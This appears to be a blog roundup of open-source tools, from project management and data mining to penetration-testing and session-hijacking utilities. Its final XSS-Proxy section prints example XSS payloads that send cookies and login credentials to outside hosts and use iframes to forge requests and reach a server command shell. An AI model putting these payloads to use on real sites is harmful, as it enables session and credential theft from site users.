Recent Articles

Optimized TCP Port Surveyor »

strobe is a network/security tool that locates and describes all listening tcp ports on a (remote) host or on many hosts in a bandwidth utilisation maximising, and process resource minimizing manner. strobe approximates a parallel finite state machine internally. In non-linear multi-host mode it attempts to apportion bandwidth and sockets among the hosts very efficiently. This can reap appreciable gains in speed for multiple distinct hosts/routes. On a machine with a reasonable number of sockets, strobe is fast enough to port scan entire Internet sub domains. It is even possible to survey an entire small country in a reasonable time from a fast machine on the network backbone, provided the machine in question uses dynamic socket allocation or has had its static socket allocation increased very appreciably (check your kernel options). In this very limited application strobe is said to be faster than ISS2.1 (a high quality commercial security scanner by [email protected] and friends) or PingWare (also commercial). (from rpm description)

Useful Project Management Tool »

Achievo is a flexible web-based resource management tool for business environments. Achievo’s resource management capabilities will enable organisations to support their business processes in a simple, but effective manner.

Project Management – This part includes management of projects, phases, tasks, notes, statistics, planning, members and project templates.

Time Registration – The time-registration part is the part where employees can register time on project/phase/activity combinations.

Scheduler – Achievo’s scheduler enables users to share a schedule with the other users.

20 Languages – Achievo’s core is available in about 20 languages.

Open Source Data Mining Platform »

KNIME, pronounced [naim], is a modular data exploration platform that enables the user to visually create data flows (often referred to as pipelines), selectively execute some or all analysis steps, and later investigate the results through interactive views on data and models.

KNIME was developed (and will continue to be expanded) by the Chair for Bioinformatics and Information Mining at the University of Konstanz, Germany. The group headed by Michael Berthold also uses KNIME for teaching and research at the University. Quite a number of new data analysis methods developed at the chair are integrated in KNIME. Let us know if you are looking for something in particular, not all of those modules are part of the standard KNIME release just yet…

The KNIME base version already incorporates over 100 processing nodes for data I/O, preprocessing and cleansing, modeling, analysis and data mining as well as various interactive views, such as scatter plots, parallel coordinates and others. It integrates all analysis modules of the well known Weka data mining environment and additional plugins allow R-scripts to be run, offering access to a vast library of statistical routines.

KNIME is based on the Eclipse platform and, through its modular API, easily extensible. When desired, custom nodes and types can be implemented in KNIME within hours thus extending KNIME to comprehend and provide first-tier support for highly domain-specific data. This modularity and extensibility permits KNIME to be employed in commercial production environments as well as teaching and research prototyping settings. If you would like to read a more detailed description of the software, please download the attached White Paper.

KNIME is released under a dual licensing scheme. The open source license (GPL) allows KNIME to be downloaded, distributed, and used freely. See license arrangements for complete details.

Go – A New Systems Programming Language »

Go is a new systems programming language from Google.

The goal of the project, as quoted below:

No major systems language has emerged in over a decade, but over that time the computing landscape has changed tremendously. There are several trends:

  • Computers are enormously quicker but software development is not faster.
  • Dependency management is a big part of software development today but the “header files” of languages in the C tradition are antithetical to clean dependency analysis—and fast compilation.
  • There is a growing rebellion against cumbersome type systems like those of Java and C++, pushing people towards dynamically typed languages such as Python and JavaScript.
  • Some fundamental concepts such as garbage collection and parallel computation are not well supported by popular systems languages.
  • The emergence of multicore computers has generated worry and confusion.

We believe it’s worth trying again with a new language, a concurrent, garbage-collected language with fast compilation. Regarding the points above:

  • It is possible to compile a large Go program in a few seconds on a single computer.
  • Go provides a model for software construction that makes dependency analysis easy and avoids much of the overhead of C-style include files and libraries.
  • Go’s type system has no hierarchy, so no time is spent defining the relationships between types. Also, although Go has static types the language attempts to make types feel lighter weight than in typical OO languages.
  • Go is fully garbage-collected and provides fundamental support for concurrent execution and communication.
  • By its design, Go proposes an approach for the construction of system software on multicore machines.

Visual Studio Command Extension »

PowerCommands is a set of useful extensions for Visual Studio that add functionality to various areas of the IDE. The source code is included and requires the VS SDK for VS 2008 to allow modification of functionality or as a reference to create additional custom PowerCommand extensions.

PowerCommands

Enable/Disable PowerCommands in Options dialog
This feature allows you to select which commands to enable in the Visual Studio IDE. Point to the Tools menu, then click Options. Expand the PowerCommands options, then click Commands. Check the commands you would like to enable.
Note: All power commands are initially defaulted Enabled.

Format document on save / Remove and Sort Usings on save
The Format document on save option formats the tabs, spaces, and so on of the document being saved. It is equivalent to pointing to the Edit menu, clicking Advanced, and then clicking Format Document. The Remove and sort usings option removes unused using statements and sorts the remaining using statements in the document being saved.
Note: The Remove and sort usings option is only available for C# documents.
Note: Format document on save and Remove and sort usings both are initially defaulted OFF.

Clear All Panes
This command clears all output panes. It can be executed from the button on the toolbar of the Output window.

Copy Path
This command copies the full path of the currently selected item to the clipboard. It can be executed by right-clicking one of these nodes in the Solution Explorer:
The solution node; A project node; Any project item node; Any folder.

Email CodeSnippet
To email the lines of text you select in the code editor, right-click anywhere in the editor and then click Email CodeSnippet.

Insert Guid Attribute
This command adds a Guid attribute to a selected class. From the code editor, right-click anywhere within the class definition, then click Insert Guid Attribute.

Show All Files
This command shows the hidden files in all projects displayed in the Solution Explorer when the solution node is selected. It enhances the Show All Files button, which normally shows only the hidden files in the selected project node.

Undo Close
This command reopens a closed document, returning the cursor to its last position. To reopen the most recently closed document, point to the Edit menu, then click Undo Close. Alternatively, you can use the Ctrl+Shift+Z shortcut.
To reopen any other recently closed document, point to the View menu, click Other Windows, and then click Undo Close Window. The Undo Close window appears, typically next to the Output window. Double-click any document in the list to reopen it.

Collapse Projects
This command collapses a project or projects in the Solution Explorer starting from the root selected node. Collapsing a project can increase the readability of the solution. This command can be executed from three different places: solution, solution folders and project nodes respectively.

Copy Class
This command copies a selected class's entire content to the clipboard, renaming the class. This command is normally followed by a Paste Class command, which renames the class to avoid a compilation error. It can be executed from a single project item or a project item with dependent sub items.

Paste Class
This command pastes a class's entire content from the clipboard, renaming the class to avoid a compilation error. This command is normally preceded by a Copy Class command. It can be executed from a project or folder node.

Copy References
This command copies a reference or set of references to the clipboard. It can be executed from the references node, a single reference node or set of reference nodes.

Paste References
This command pastes a reference or set of references from the clipboard. It can be executed from different places depending on the type of project. For CSharp projects it can be executed from the references node. For Visual Basic and Website projects it can be executed from the project node.

Copy As Project Reference
This command copies a project as a project reference to the clipboard. It can be executed from a project node.

Edit Project File
This command opens the MSBuild project file for a selected project inside Visual Studio. It combines the existing Unload Project and Edit Project commands.

Open Containing Folder
This command opens a Windows Explorer window pointing to the physical path of a selected item. It can be executed from a project item node.

Open Command Prompt
This command opens a Visual Studio command prompt pointing to the physical path of a selected item. It can be executed from four different places: solution, project, folder and project item nodes respectively.

Unload Projects
This command unloads all projects in a solution. This can be useful in MSBuild scenarios when multiple projects are being edited. This command can be executed from the solution node.

Reload Projects
This command reloads all unloaded projects in a solution. It can be executed from the solution node.

Remove and Sort Usings
This command removes and sorts using statements for all classes in a given project. It is useful, for example, in removing or organizing the using statements generated by a wizard. This command can be executed from a solution node or a single project node.

Extract Constant
This command creates a constant definition statement for a selected text. Extracting a constant effectively names a literal value, which can improve readability. This command can be executed from the code editor by right-clicking selected text.

Clear Recent File List
This command clears the Visual Studio recent file list. The Clear Recent File List command brings up a Clear File dialog which allows any or all recent files to be selected.

Clear Recent Project List
This command clears the Visual Studio recent project list. The Clear Recent Project List command brings up a Clear File dialog which allows any or all recent projects to be selected.

Transform Templates
This command executes a custom tool with associated text templates items. It can be executed from a DSL project node or a DSL folder node.

Close All
This command closes all documents. It can be executed from a document tab.

Java Play Framework »

Here is another Java framework that I am experimenting with now.

Play Framework is a Java framework by web developers which makes it easier to build web applications with Java.

The features

Fix the bug and hit reload! Edit your Java files, save, refresh your browser and see the results immediately! No need to compile, deploy or restart the server.

Stateless model – Play is a real "Share nothing" system. Ready for REST, it is easily scaled by running multiple instances of the same application on several servers.

Efficient template system – A clean template system based on Groovy as an expression language. It provides template inheritance, includes and tags.

Resolve errors quickly – When an error occurs, Play shows you the source code and the exact line containing the problem. Even in templates.

All you need to create a cool web application – Provides integration with Hibernate, OpenID, Memcached… and a plugin system.

Pure Java – Code with Java, use any Java library and develop with your preferred IDE. Integrates nicely with Eclipse or NetBeans.

Really fast – Starts fast and runs fast!

Open Source Network Auditing and Penetration Testing Tools »

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

Open Source Wireless Hacking »

AirFart is a wireless tool created to detect wireless devices, calculate their signal strengths, and present them to the user in an easy-to-understand fashion. It is written in C/C++ with a GTK front end. Airfart supports all wireless network cards supported by the linux-wlan-ng Prism2 driver that provide hardware signal strength information in the "raw signal" format (ssi_type 3). Airfart implements a modular n-tier architecture with the data collection at the bottom tier and a graphical user interface at the top.

WifiScanner is a tool designed to discover wireless nodes (i.e. access points and wireless clients). It is distributed under the GPL License.
It works with CISCO® cards and Prism cards with the hostap or wlan-ng driver, prism54g, Hermes/Orinoco, Atheros, Centrino, …
An IDS is integrated to detect anomalies such as MAC usurpation.

Finding Website Vulnerabilities »

SiteDigger searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.

  • The tool requires a Google web services API license key. Browse to http://www.google.com/apis/ and follow the instructions to get the license key.
  • Provide the license key at the bottom-right box on the tool.
  • Enter the domain / sub-domain information. (.mil, nasa.gov, usc.edu, etc).
  • Select search categories using signature tab.
  • Hit the search button. Use the export results button to view the results in tabular format.

Assembler Debugger for Windows »

OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg is shareware, but you can download and use it for free. Special highlights are:

  • Intuitive user interface, no cryptical commands
  • Code analysis – traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
  • Directly loads and debugs DLLs
  • Object file scanning – locates routines from object files and libraries
  • Allows for user-defined labels, comments and function descriptions
  • Understands debugging information in Borland® format
  • Saves patches between sessions, writes them back to executable file and updates fixups
  • Open architecture – many third-party plugins are available
  • No installation – no trash in registry or system directories
  • Debugs multithread applications
  • Attaches to running programs
  • Configurable disassembler, supports both MASM and IDEAL formats
  • MMX, 3DNow! and SSE data types and instructions, including Athlon extensions
  • Full UNICODE support
  • Dynamically recognizes ASCII and UNICODE strings – also in Delphi format!
  • Recognizes complex code constructs, like call to jump to procedure
  • Decodes calls to more than 1900 standard API and 400 C functions
  • Gives context-sensitive help on API functions from external help file
  • Sets conditional, logging, memory and hardware breakpoints
  • Traces program execution, logs arguments of known functions
  • Shows fixups
  • Dynamically traces stack frames
  • Searches for imprecise commands and masked binary sequences
  • Searches whole allocated memory
  • Finds references to constant or address range
  • Examines and modifies memory, sets breakpoints and pauses program on-the-fly
  • Assembles commands into the shortest binary form
  • Starts from the floppy disk

Build a Geek House »

Software from the book Geek House, published by Wiley, written by the authors of PC Toys. Project code is for a bar code inventory, security monitoring, a recipe database, a barbeque controller, and a soil moisture driven sprinkler controller.

The code is available at http://sourceforge.net/projects/geekhouse/

Open Source Penetration Testing Tool »

Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Moblin »

Moblin is an open source project focused on building a Linux-based platform optimized for the next generation of mobile devices including Netbooks, Mobile Internet Devices, and In-vehicle infotainment systems.

The Moblin Architecture is designed to support multiple platforms and usage models ranging from Netbooks to Mobile Internet Devices (MID), to various embedded usage models, such as the In Vehicle Infotainment systems. The central piece of the architecture is the common layer we call "Moblin Core", a hardware and usage model independent layer that provides one uniform way to develop such devices. Underneath the Moblin Core sits the Linux kernel and device drivers specific to the hardware platform, and above the Moblin Core are the specific user interface and user interaction model for the target device.

Open Source UML and Code Generator »

Acceleo is a code generator transforming models into code (MDA approach).

Acceleo is easy to use. It provides "off the shelf" generators (JEE, .Net, Php…) and template editors for Eclipse.

Acceleo is natively integrated with eclipse. It is completely merged with its interface for better efficiency and user experience.

Acceleo provides many features for template editing

  • syntax highlighting
  • meta-model and scripts based completion
  • real time error detection
  • real time preview

Acceleo is based on the main industry standards to guarantee high level compatibility, interoperability and durability.

Acceleo is especially compatible with XMI 1.x and XMI 2, ensuring compatibility with the main UML modelers on the market (RSM, Together, Poseidon, …).

Open Source Church Software »

Datasoul is open source presentation software for displaying lyrics and text in church services.

Datasoul keeps lyrics and display format independently. This means that when you want to change the font format or the background image, you don’t need to change tons of files. Take a look at how easy it is in Datasoul.

Besides the lyrics, Datasoul can also hold the chords for the songs. This way, once you have selected the songs for the next service, you can easily retrieve the chords for those songs to print or send to the musicians.

In most churches, you usually need to display some announcements during services. Whether it’s a baby crying in the nursery or a wrongly parked car, something always happens. See how Datasoul handles these situations.

Several churches use video cameras to record or transmit live images from the service. Datasoul can integrate with these systems and provide an effective solution for displaying lyrics.

Do you have all your songs in EasyWorship? There is an import tool available that converts them into Datasoul format. Once imported, you can also take your database to another operating system such as Linux or MacOS.

A Useful Windows File Manager »

Qmmander is an open source filemanager with splitscreen filehandling like the widely known "Norton Commander" which was likely the force behind the development of all the filemanagers out there with a "Commander" in their names.

Qmmander is written in C++ and uses Qt, a cross-platform application and GUI framework from Nokia.

Java MMS Library »

I just released the Java MMS library. It is a library that can be used to encode or decode MMS messages. The encoded MMS can then be sent out using the MM1 or MM7 protocol. To use the MM1 protocol, you need a GPRS/3G modem or GPRS/3G phone. For MM7, you need a connection to an MMSC.

A simple sample is provided to show how to use it together with jWAP to send out MMS using MM1 protocol.

    // wapGatewayHost, wapGatewayPort, servlet and encodedMms are supplied by the caller.
    WAPClient wapClient = new WAPClient(wapGatewayHost, wapGatewayPort);
    PostRequest request = new PostRequest(servlet);
    request.setContentType("application/vnd.wap.mms-message");
    request.setRequestBody(encodedMms);

    System.out.println("Connecting to \"" + wapGatewayHost + "\":" + wapGatewayPort + "...");
    wapClient.connect();

    // Post the encoded MMS through the WAP gateway and read the binary reply.
    System.out.println("Sending mms message through \"" + servlet + "\"...");
    Response response = wapClient.execute(request);
    byte[] binaryMms = response.getResponseBody();
    wapClient.disconnect();
    try {
        // The reply body is itself an encoded MMS message; decode it.
        MultimediaMessageDecoder dec = new MultimediaMessageDecoder(binaryMms);
        dec.decodeMessage();
        MultimediaMessage message = dec.getMessage();

        System.out.println("Status: " + response.getStatus());
        System.out.println("Status Text: " + response.getStatusText());

        if (response.getStatus() == 200) {
            System.out.println("Message id: " + message.getMessageId());
            System.out.println("Message sent!");
        } else {
            System.out.println("Message is not sent");
        }

    } catch (Exception e) {
        // Decoding failed or the reply was malformed.
        System.out.println(e.getMessage());
    }

Closure Tools from Google »

Google Closure tools help developers to build rich web applications with JavaScript that is both powerful and efficient. The Closure tools include:

A JavaScript optimizer

The Closure Compiler compiles JavaScript into compact, high-performance code. The compiler removes dead code and rewrites and minimizes what’s left so that it downloads and runs quickly. It also checks syntax, variable references, and types, and warns about common JavaScript pitfalls. These checks and optimizations help you write apps that are less buggy and easier to maintain. You can use the compiler with Closure Inspector, a Firebug extension that makes debugging the obfuscated code almost as easy as debugging the human-readable source.

A comprehensive JavaScript library

The Closure Library is a broad, well-tested, modular, and cross-browser JavaScript library. You can pull just what you need from a large set of reusable UI widgets and controls, and from lower-level utilities for DOM manipulation, server communication, animation, data structures, unit testing, rich-text editing, and more.

The Closure Library is server-agnostic, and is intended for use with the Closure Compiler.

An easy templating system for both Java & JavaScript

Closure Templates simplify the task of dynamically generating HTML. They have a simple syntax that is natural for programmers. In contrast to traditional templating systems, in which you use one big template per page, you can think of Closure Templates as small components that you compose to form your user interface.

Closure Templates are implemented for both JavaScript and Java, so that you can use the same templates on both the server and client side. For the client side, Closure Templates are precompiled into efficient JavaScript.

Open Source TCP Session Hijacking Tool »

Hunt is a tool for exploiting well known weaknesses in the TCP/IP protocol. It is used primarily to hijack connections, but has many other features.

Hunt is a program for intruding into a connection, watching it and resetting it. Hunt operates on Ethernet and is best used for connections which can be watched through it. However, it is possible to do something even for hosts on other segments or hosts that are on switched ports. Hunt doesn’t distinguish between local network connections and connections going to/from the Internet. It can handle all connections it sees. Connection hijacking is aimed primarily at telnet or rlogin traffic but it can be used for other traffic too. Features: connection management (watching, spoofing, detecting, hijacking, resetting), daemons (resetting, arp spoof/relayer daemon, MAC discovery daemon for collecting MAC addresses, sniff daemon for logging TCP traffic), host resolving, packet engine (TCP, UDP, ICMP and ARP traffic; collecting TCP connections with sequence numbers and the ACK storm detection), switched environment (hosts on switched ports can be spoofed, sniffed and hijacked too). This latest release includes lots of debugging and fixes in order to get hunt running against hosts on switched ports, timejobs, dropping IP fragments, verbose status bar, options, new connection indicator, various fixes.

Cross Site Scripting Attack Tool »

XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.

Types of information leakage due to XSS attack

1. Client can reveal cookies to 3rd party (session state, order info, etc)

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

2. Client can reveal posted form items to 3rd party (userID/passwd, etc)

<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>

3. Client can be tricked into accessing/posting spoofed info to trusted server

http://www.trustedserver.com/xss.asp?name = <iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>

4. Client can be tricked into attacking other sites

/hello.asp?name = <iframe
src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>
